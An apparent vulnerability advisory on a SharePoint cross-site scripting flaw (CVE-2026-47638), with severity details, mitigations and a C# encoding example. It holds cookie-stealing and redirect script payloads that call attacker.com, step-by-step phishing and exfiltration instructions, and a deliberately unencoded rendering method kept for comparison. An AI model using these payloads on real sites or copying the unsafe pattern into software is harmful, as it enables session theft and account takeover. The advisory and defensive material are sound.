Intro
CVE-2026-47638 is a cross‑site scripting (XSS) vulnerability in Microsoft Office SharePoint. The root cause is the improper neutralization of user‑supplied input during web page generation (CWE‑79). When SharePoint constructs a page, it fails to safely encode or validate certain data, allowing an authenticated attacker to inject arbitrary JavaScript code into the page’s output.
An attacker who has valid SharePoint credentials and permission to modify content can craft a malicious request containing a script payload. If a victim – typically a higher‑privileged user – later opens the compromised page, the injected script executes within the victim’s browser in the security context of the SharePoint site.
Because the script runs under the victim’s session, the attacker can perform spoofing attacks. For example, the script can alter the page’s content to mimic a trusted login form, change displayed data, or redirect the victim to a malicious website. More advanced scripts can exfiltrate the victim’s session token (document.cookie) or perform actions on behalf of the victim, such as granting the attacker additional permissions.
The vulnerability is reflected (or possibly stored) and requires the victim to interact with a malicious link or page. The CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N vector indicates a medium severity (4.6). The attack is network‑based, low complexity, requires low attacker privileges, and needs user interaction. The scope is unchanged; confidentiality and integrity are partially impacted, while availability is unaffected.
Affected products include Microsoft SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition. No specific version numbers are publicly disclosed, so any release of those products prior to a security update is vulnerable. Microsoft is expected to issue a patch on the next Patch Tuesday (July 14, 2026).
DailyCVE Form
Platform: Microsoft Office SharePoint
Version: 2016/2019/Subscription
Vulnerability: Cross-site Scripting
Severity: MEDIUM
Date: 06/09/2026
Prediction: July 14, 2026
What Undercode Say
Analytics
Check SharePoint version via PowerShell (run in the SharePoint Management Shell, where the SharePoint snap-in is loaded)
Get-SPFarm | Select BuildVersion
Test for reflected XSS with curl
curl -k "https://sharepoint.example.com/_layouts/15/somepage.aspx?param=<script>alert('XSS')</script>"
Example XSS payload stealing session cookies
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>
Example XSS payload redirecting to a spoofed page
<script>
window.location = 'https://attacker.com/fake-login.html';
</script>
Exploit
- Reconnaissance – Identify a SharePoint endpoint that reflects user input without proper encoding (e.g., search result pages, custom error handlers, or user‑modifiable content fields).
- Craft Payload – Inject a JavaScript payload into the vulnerable parameter, for example:
<script>fetch('https://attacker-controlled.com/steal?cookie='+document.cookie)</script>
- Deliver – Send the malicious link to a victim via email, chat, or any medium that will cause them to click while authenticated to SharePoint.
- Exfiltrate – The victim’s browser executes the script, sending session cookies (or other sensitive data) to the attacker’s server.
- Spoof – Using the stolen session, the attacker can impersonate the victim, perform actions on their behalf, or display misleading information.
Protection
- Apply Security Update – As soon as Microsoft releases the July 2026 Patch Tuesday cumulative update, install it on all SharePoint servers.
- Content Security Policy (CSP) – Add a CSP header in `web.config` (under `<system.webServer><httpProtocol><customHeaders>`) that does not permit inline script; a policy carrying `'unsafe-inline'` or `'unsafe-eval'` would not stop an injected `<script>` block. SharePoint's own pages rely heavily on inline script, so deploy it first as `Content-Security-Policy-Report-Only`, review the violation reports, and only then enforce:
<add name="Content-Security-Policy" value="default-src 'self'; script-src 'self'; object-src 'none'" />
- Output Encoding – Use `SPHttpUtility.HtmlEncode()` for any user‑supplied data rendered as HTML text, and the matching `SPHttpUtility` encoder for other output contexts (attribute values, URL parameters, script string literals), since HTML encoding alone does not protect those contexts.
- Input Validation – Validate and sanitize all user inputs, especially those that appear in URLs or are stored and later displayed.
- Least Privilege – Limit content‑editing permissions to only those users who absolutely need them.
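The output-encoding item above, shown in code. This is an added example, not code from the advisory, from Microsoft or from Undercode; the web part class, the parameter name `q` and the `/search.aspx` path are assumptions, since the advisory does not name the vulnerable endpoint or parameter.

```csharp
// Added example, not from the advisory or from Microsoft: a minimal SharePoint
// web part that echoes a query-string value. RenderUnsafe is the CWE-79 pattern
// described above; RenderEncoded applies one SPHttpUtility encoder per output
// context. Compile against Microsoft.SharePoint.dll on a SharePoint server.
using System.Web.UI;
using System.Web.UI.WebControls.WebParts;
using Microsoft.SharePoint.Utilities;

public class SearchEchoWebPart : WebPart
{
    // Hypothetical parameter name; the advisory does not name the real one.
    private const string ParamName = "q";

    // Raw, untrusted value. ASP.NET request validation is commonly disabled in
    // SharePoint's web.config, so never assume markup has already been stripped.
    private string RawTerm
    {
        get { return Context.Request.QueryString[ParamName] ?? string.Empty; }
    }

    // BEFORE: untrusted input concatenated into an HTML body, into a URL inside
    // an attribute, and into a JavaScript string literal without encoding.
    // A value containing a tag, a quote or an apostrophe breaks out of each one.
    private void RenderUnsafe(HtmlTextWriter writer)
    {
        writer.Write("<p>Results for: " + RawTerm + "</p>");
        writer.Write("<a href=\"/search.aspx?q=" + RawTerm + "\">Search again</a>");
        writer.Write("<script>var term = '" + RawTerm + "';</script>");
    }

    // AFTER: the encoder must match the context the data lands in. HtmlEncode
    // alone is not enough for a URL parameter or a script literal, because the
    // browser decodes those contexts differently from HTML text.
    private void RenderEncoded(HtmlTextWriter writer)
    {
        writer.Write("<p>Results for: " + SPHttpUtility.HtmlEncode(RawTerm) + "</p>");
        writer.Write("<a href=\"/search.aspx?q="
            + SPHttpUtility.UrlKeyValueEncode(RawTerm) + "\">Search again</a>");
        writer.Write("<script>var term = '"
            + SPHttpUtility.EcmaScriptStringLiteralEncode(RawTerm) + "';</script>");
    }

    protected override void Render(HtmlTextWriter writer)
    {
        RenderEncoded(writer); // RenderUnsafe is kept only for comparison
    }
}
```

Reviewing existing web parts and application pages for the RenderUnsafe pattern is the code-level check that complements the patch, since the update fixes Microsoft's pages but not custom ones.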
Impact
- Spoofing – An attacker can present fake content that appears legitimate, tricking users into disclosing credentials or performing unintended actions.
- Session Theft – Stolen authentication cookies allow the attacker to impersonate the victim, gaining access to all data and actions the victim can perform.
- Data Exfiltration – Confidential data visible in the victim’s browser (e.g., document content, lists, personal information) can be extracted.
- Account Takeover – Combined with other weaknesses, the stolen session can lead to full compromise of the SharePoint account and possibly domain credentials.
Sources:
Reported By: nvd.nist.gov